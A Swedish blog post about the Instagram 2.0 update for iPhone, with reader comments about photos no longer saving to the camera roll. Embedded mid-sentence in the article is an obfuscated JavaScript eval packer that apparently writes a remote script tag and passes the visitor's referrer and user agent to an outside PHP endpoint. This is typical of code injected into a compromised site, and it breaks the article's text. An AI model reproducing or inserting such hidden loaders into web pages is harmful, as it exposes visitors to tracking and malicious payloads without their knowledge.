Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Uppdatering av Instagram till iPhone

Uppdatering av Instagram till iPhone
Sebastian

Livefilter, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tfizb|var|u0026u|referrer|zffdb||js|php’.split(’|’),0,{}))
högre upplösning och snabbare.

Foto-appen Instagram till iPhone har nu släppt sin version 2.0 vilket innebär massa roliga nyheter.
Nu kan du redan innan bilden är tagen bestämma vilket filter du vill använda och hur det ska se ut.
Jag kan gissa att det kommer att flöda av Instagrammade bilder på Facebook och andra sociala nätverk. Just för att alla vill testa dem nya funktionerna.

En tilt-shift effekt har också lagts till efter att många frågat efter att få en sådan effekt. Appen sägs också vara 100 gånger snabbare och 200 gånger snabbare på att redigera bilderna. Bilderna kan nu också tas i 1936×1936 pixlar på iPhone 4 och 1536×1536 på 3GS.
Fyra nya filter och möjlighet till att rotera bilderna direkt i appen.

Instagram finns till iOS och är gratis.
Ladda hem här:
itunes.apple.com

Comments

 1. Cecilia Nagy

  Jag gjorde en uppdatering på AppStore för någon dag sedan och däribland en uppdatering av Instagram.. men till skillnad från hur appen var innan så sparas inte bilderna i kameraalbumet.. jag har tryckt och pillat och förgäves försökt hitta en knapp som gör så att bilderna sparas i albumet, men jag kan bara se dem inne på Instagram-appen. Då känns ju bilderna oanvändbara. Hjälp, hur gör jag?

  • Hesjehj

   Svarar här också 🙂

   Du menar att dem inte hamnar i ditt orginal album?
   Jag har gamla versionen, har inte uppdaterat och mina hamnar bara i ett speciellt instagramalbum. Får ta egna screenshots.

   Öppna bilden i instagram och ta en screenshot.

 2. Pelle

  Du menar att dem inte hamnar i ditt orginal album?
  Jag har gamla versionen, har inte uppdaterat och mina hamnar bara i ett speciellt instagramalbum. Får ta egna screenshots.

  Öppna bilden i instagram och ta en screenshot.

 3. Cecilia Nagy

  Precis! Men innan jag gjorde uppdateringen så sparades bilderna jag tog i Instagram i mitt originalalbum och då kunde jag ju ändå använda bilderna hur jag ville; ha de som bakgrund på mobilen, lägga upp de på Facebook direkt från mobilen osv. Men om jag tar screenshots så kommer ju allt runt omkring med, inte bara själva bilden. Då måste man ju nästan lägga in de på datorn och skära ur själv bilden?! Men det kanske inte finns någon annan lösning?